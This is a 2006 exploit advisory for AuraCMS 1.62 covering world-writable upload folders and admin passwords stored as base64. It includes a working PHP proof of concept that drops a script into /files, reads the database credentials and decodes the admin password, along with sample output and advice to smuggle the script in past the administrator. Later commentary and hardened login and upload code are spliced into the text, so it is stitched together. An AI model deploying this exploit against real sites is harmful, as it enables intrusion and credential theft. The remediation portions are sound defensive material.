vulnerabilities in AuraCMS162

Author: roninmorgue
Date: May, 27th 2006
Location: Indonesia, Jakarta
Web: http://www.forum.mercubuana-it.org/
-----------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
AuraCMS162 is a free Content Management System, written in php.
Author: Arif Supriyanto - arif@ayo.kliksini.com
http://www.auracms.tk
http://www.semarang.tk
http://www.ayo.kliksini.com
http://www.auracms.opensource-indonesia.com

Version : 1.62
tested on AuraCMS1.62
not tested on older or newer versions, but they may well be affected in the
same way
-----------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~
After the many vulnerabilities found up to version 1.61, which I found myself and
reported to the vendor, receiving a positive response, the vendor released version
1.62 with patches for the files that contained the vulnerabilities.

Vulnerabilities that can still be exploited in version 1.62 ->

A. PHP Local Root Exploit :

AuraCMS162 installation instructions ->

Upload the files to the web host.
Set the file permissions as follows:
chmod 755 for the *.php files
chmod 777 for the /images folder
chmod 777 for the /files folder
chmod 777 for the file /mod/online.db.txt
chmod 777 for the file /mod/counter.txt
chmod 777 for the file /mod/month.txt
chmod 777 for the file /mod/today.txt

Note that the /files folder is given mode 777, so any account on the server,
including the web-server process itself, can write files into it.

The /files folder is where the downloadable files are kept, and it is also where
uploads land. Because it sits under the web root, a .php file that ends up there
is executed by the web server on the next request for it. Despite the heading, that
is code execution as the web-server user, not root; it is enough, though, to
include ../config.php and read the database credentials, which is what the PoC
below does.

B. Administrator Account Vulnerability :

AuraCMS <= 1.62 does not encrypt the username in the user table;
AuraCMS <= 1.62 "encrypts" the admin password with base64_encode before storing it.
base64 is an encoding, not encryption: there is no key, and base64_decode recovers
the original password from the stored value in a single call. Anyone who can read
the user table (for example from a script dropped into /files, see A) has the admin
password in clear.

log.php

if(ereg("log.php",$PHP_SELF)) {
  if ($_POST['k']=='check'){
    include "config.php";
    // $user comes from the request (register_globals) and is pasted into the query
    // unescaped; column 3 of the row holds base64_encode() of the stored password.
    $result = mysql_query("SELECT * FROM user WHERE user='$user'", $koneksi_db);
    $num = mysql_numrows($result);
    $row = mysql_fetch_row($result);
    $password = base64_encode($password);
    if($password!=$row[3] || $num<=0){echo "
      <script>alert('Username or Password is wrong !');
      window.history.go(-1);</script>";}
    else{
      session_register("info");
      //session_register("user_loged");
      // The session blob is base64 of "username:realname:base64(password)"
      $info = base64_encode("$row[1]:$row[2]:$row[3]");
===================== truncated ==============================
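The same login check, rewritten the way it should be done. This is an added example, not AuraCMS code and not the vendor's patch: the stored value becomes a salted password hash that base64_decode cannot reverse, and the username is bound as a query parameter instead of being interpolated into the SQL string. It assumes mysqli, a `user` table with columns `user` and `password` (names taken from the snippets on this page), and the $mysql_host, $mysql_user, $mysql_password and $mysql_database variables that config.php defines; the migration helper is an assumption about how an existing install would be converted.

```php
<?php
// Added example, not AuraCMS code: the log.php check with a salted password hash
// and a prepared statement. Assumes mysqli, a `user` table with columns `user`
// and `password`, and $mysql_* from config.php (as the exploit's include shows).

function hash_password(string $plain): string
{
    // password_hash() emits "$2y$10$<salt><hash>": algorithm, cost and a random
    // salt travel with the hash, so equal passwords hash differently and a lookup
    // table built for unsalted MD5 does not apply.
    return password_hash($plain, PASSWORD_DEFAULT);
}

function authenticate(mysqli $db, string $user, string $password): bool
{
    $stmt = $db->prepare('SELECT password FROM user WHERE user = ? LIMIT 1');
    $stmt->bind_param('s', $user);      // bound parameter, never string-concatenated
    $stmt->execute();
    $stmt->bind_result($stored);
    $found = $stmt->fetch();
    $stmt->close();
    if (!$found) {
        return false;                   // unknown user
    }
    // password_verify() reads salt and cost out of $stored and compares in
    // constant time; the plaintext never needs to be recoverable.
    return password_verify($password, (string) $stored);
}

function migrate_legacy_password(mysqli $db, string $user, string $b64): bool
{
    // Assumed one-off migration for rows written by AuraCMS <= 1.62, which stored
    // base64_encode($password): decode, rehash, overwrite.
    $plain = base64_decode($b64, true);
    if ($plain === false) {
        return false;                   // not valid base64, leave the row alone
    }
    $hash = hash_password($plain);
    $stmt = $db->prepare('UPDATE user SET password = ? WHERE user = ?');
    $stmt->bind_param('ss', $hash, $user);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Replacement for the $_POST['k'] == 'check' branch of log.php.
function handle_login(): void
{
    if (($_POST['k'] ?? '') !== 'check') {
        return;
    }
    include 'config.php';               // defines $mysql_* (as in the original)
    $db = new mysqli($mysql_host, $mysql_user, $mysql_password, $mysql_database);
    session_start();
    $user = (string) ($_POST['user'] ?? '');
    $pass = (string) ($_POST['password'] ?? '');
    if (authenticate($db, $user, $pass)) {
        session_regenerate_id(true);    // fresh session id once privilege changes
        $_SESSION['info'] = $user;      // store the identity, not the password
        header('Location: index.php');
    } else {
        echo '<script>alert("Username or Password is wrong !");window.history.go(-1);</script>';
    }
}

handle_login();
```

Note the session no longer carries `base64(password)` as the original's `$info` did; a session hijack then yields a login, not the credential itself. The mysql_* functions used by the original were removed in PHP 7, so a rewrite has to move to mysqli or PDO anyway.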
So now, how do we exploit AuraCMS 1.62 with the two vulnerabilities we know about?
OK, straight to it: I have written a simple script that obtains the administrator
account and decodes the password.

Note: this script must be uploaded to the target server -> http://www.target.com/files/auraExploit.php
How -> up to you; for instance by hiding the script inside a file you upload
and hoping the admin doesn't notice... :)

PoC:

auraExploit.php
<?php
/*****************************************************/
/* Hacking AuraCMS162: Hacking auraCMS162 with PHP Local Root Exploit */
/* ===========================================================*/
/* */
/* Copyright (c) 2006 by anstellwinkel (anstellwinkel@yahoo.com.au) */
/* or roninmorgue@yahoo.co.id */
/* */
/* This program is free software. You may redistribute and modify it */
/* as you wish, as long as you keep the author's name. */
/* Published Date:12:15:47 Sunday, May 28, 2006 */
/****************************************************/

print "=======================================<br>";
print "AuraCMS162 Local Root Exploit<br>";
print "=======================================<br>";

print "[+] Now attacking<br>";
print "[+] Building page extension..";
// /files is chmod 777, so the web-server user running this script may create
// hackaura.php next to it. "a+": create if missing, append otherwise.
$exploit_file = fopen("hackaura.php", "a+");
print "[DONE]<br>";
print "[+] Set User Autentification..";
// Nowdoc ('PHP') keeps the payload verbatim: $mysql_* is not interpolated and
// the inner double quotes need no escaping (a plain "..." string breaks on both).
$the_exploit = <<<'PHP'
<?php
// Runs from /files, so config.php (DB host, user, password, database) is one level up.
// mysql_* is the PHP 4/5 API the target uses (removed in PHP 7).
include("../config.php");
mysql_connect($mysql_host, $mysql_user, $mysql_password);
$hasil = mysql_db_query($mysql_database, "SELECT * FROM user");
while ($data = mysql_fetch_array($hasil)) {
    // Keeps only the last row; enough when the table holds the single admin.
    $user = $data['user'];
    $pass = $data['password'];
}
echo "Username: $user<br>";
echo "EncryptPassword: $pass<br>";
echo "DecryptPassword: ";
echo base64_decode($pass);   // base64 is an encoding, not encryption: no key needed
?>
PHP;
print "[DONE]<br>";
print "[+] Sending bugs writable [a+]..<br>";
print "[+] Create hackaura.php...";
if ($exploit_file !== false && flock($exploit_file, LOCK_EX)) {
    fputs($exploit_file, $the_exploit);
    flock($exploit_file, LOCK_UN);
    print "[OK] ";
    print "[+] Sending bugs..[DONE]!!<br>";
    print "[*] Exploited Successed!<br>";
    print "<br>";
    print "------------------------------------------------<br>";
    print " + Information:[anstellwinkel@yahoo.com.au]-[www.forum.mercubuana-it.org] +<br>";
    print "-----------------------------------------------------<br>";
} else {
    // fopen() fails when /files is not writable after all.
    print "[!] [FAILED] Permission is not writable!!<br>";
    print "-----------------------------------------------<br>";
    print " + Information:[anstellwinkel@yahoo.com.au]-[www.forum.mercubuana-it.org] +<br>";
    print "----------------------------------------------------<br>";
}

if ($exploit_file !== false) {
    fclose($exploit_file);
}
print "<a href=\"hackaura.php\">Aura Administrator Exploited</a>";
?>
------------------[EOF]-----------------------------------
Attack sample
target ->> http://jouninhackers/auracms162/files/auraExploit.php

=======================================
AuraCMS162 Local Root Exploit
=======================================
[+] Now attacking
[+] Building page extension..[DONE]
[+] Set User Autentification..[DONE]
[+] Sending bugs writable [a+]..
[+] Create hackaura.php...[OK] [+] Sending bugs..[DONE]!!
[*] Exploited Successed!
------------------------------------------------------------------
+ Information:[anstellwinkel@yahoo.com.au]-[www.forum.mercubuana-it.org] +
------------------------------------------------------------------
Aura Administrator Exploited

Click the link "Aura Administrator Exploited":

http://jouninhackers/auracms162/files/hackaura.php
Username: roninmorgue
EncryptPassword: cjBuMW5tMHJndTM=
DecryptPassword:r0n1nm0rgu3
------------------------------------------------------------------
The fix:
~~~~~~~~

The vendor has been contacted.
Fixing it yourself:
1. Disable the download/upload module.
2. If you keep it enabled, inspect every uploaded file carefully; remember, you
are the admin!
3. Write a routine that deletes every file with a .php extension in the /files
and /images folders.
4. Replace the password encoding with the MD5 function.
(Caveat on 4: unsalted MD5 is barely better. It is not reversible like base64, but
common passwords are recovered from precomputed tables in seconds; use a salted,
slow password hash such as PHP's password_hash(). On 3: the directories also do not
need mode 777; writable by the web-server user is enough, and the web server should
be told not to execute scripts from them at all.)
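Fix items 2 and 3 in code. This is an added example, not AuraCMS code: an upload handler that only accepts a whitelisted extension into /files and renames the file itself, and a sweep that removes anything with a PHP-executable extension from /files and /images. The directory layout and the `userfile` form field name are assumptions; the extension whitelist is a placeholder to adjust for the site.

```php
<?php
// Added example, not AuraCMS code, for fix items 2 and 3. Assumed layout:
// this script and the /files and /images folders live under the web root.
const UPLOAD_DIR  = __DIR__ . '/files';
const ALLOWED_EXT = ['zip', 'pdf', 'txt', 'jpg', 'png', 'gif'];   // assumed whitelist
// Extensions mod_php / php-fpm may execute, plus .htaccess, which could re-enable
// execution. "(\.|$)" makes the pattern catch shell.php.jpg as well as shell.php.
const FORBIDDEN_PATTERN = '/\.(php\d*|phtml|phar|htaccess)(\.|$)/i';

function is_safe_upload_name(string $name): bool
{
    $base = basename($name);                         // drop any directory part
    if ($base === '' || $base[0] === '.') {
        return false;                                // no dotfiles
    }
    if (preg_match(FORBIDDEN_PATTERN, $base)) {
        return false;                                // executable, any position
    }
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    return in_array($ext, ALLOWED_EXT, true);        // whitelist, not blacklist
}

function store_upload(array $file): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    if (!is_safe_upload_name($file['name'])) {
        return null;
    }
    // The client's name is only trusted for its (already validated) extension;
    // the stored name is random so nothing can be requested by a guessed name.
    $ext  = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(8)) . '.' . $ext;
    return move_uploaded_file($file['tmp_name'], $dest) ? $dest : null;
}

function sweep_executables(array $dirs): array
{
    // Fix item 3: remove anything executable that is already sitting in the
    // upload folders (e.g. a previously dropped hackaura.php). Returns the paths removed.
    $removed = [];
    foreach ($dirs as $dir) {
        $it = new RecursiveIteratorIterator(
            new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
        );
        foreach ($it as $f) {
            if ($f->isFile() && preg_match(FORBIDDEN_PATTERN, $f->getFilename())) {
                if (unlink($f->getPathname())) {
                    $removed[] = $f->getPathname();
                }
            }
        }
    }
    return $removed;
}

// Handler: run the sweep first, then take the upload (assumed field name 'userfile').
foreach (sweep_executables([UPLOAD_DIR, __DIR__ . '/images']) as $path) {
    error_log("removed executable upload: $path");
}
if (isset($_FILES['userfile'])) {
    $saved = store_upload($_FILES['userfile']);
    echo $saved ? 'Stored as ' . htmlspecialchars(basename($saved)) : 'Upload rejected';
}
```

The sweep is a cleanup, not a guarantee: the real control is to stop the web server from executing anything under /files and /images at all, for example with `php_admin_flag engine off` inside a `<Directory>` block for those paths in the Apache configuration when PHP runs as mod_php, so that a file that slips past the filter is served as bytes rather than run.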

----------------------------------------------------------------
Shoutz:
~~~~~~~
~ forum|staff (roninmorgue, darkstar, admin, qnoyyy, gaga, kalion, WaferStick, cloud, newbie)
~ mercubuana-it@yahoogroups.com ,
---------------------------------------------------------------
Contact:
~~~~~~~~

roninmorgue || forum|staff
Homepage: http://www.forum.mercubuana-it.org/
email: roninmorgue[at]yahoo[dot]co[dot]id
-------------------------------- [ EOF ] ---------------------

Posted by roninmorgue on 08/25 at 01:37 AM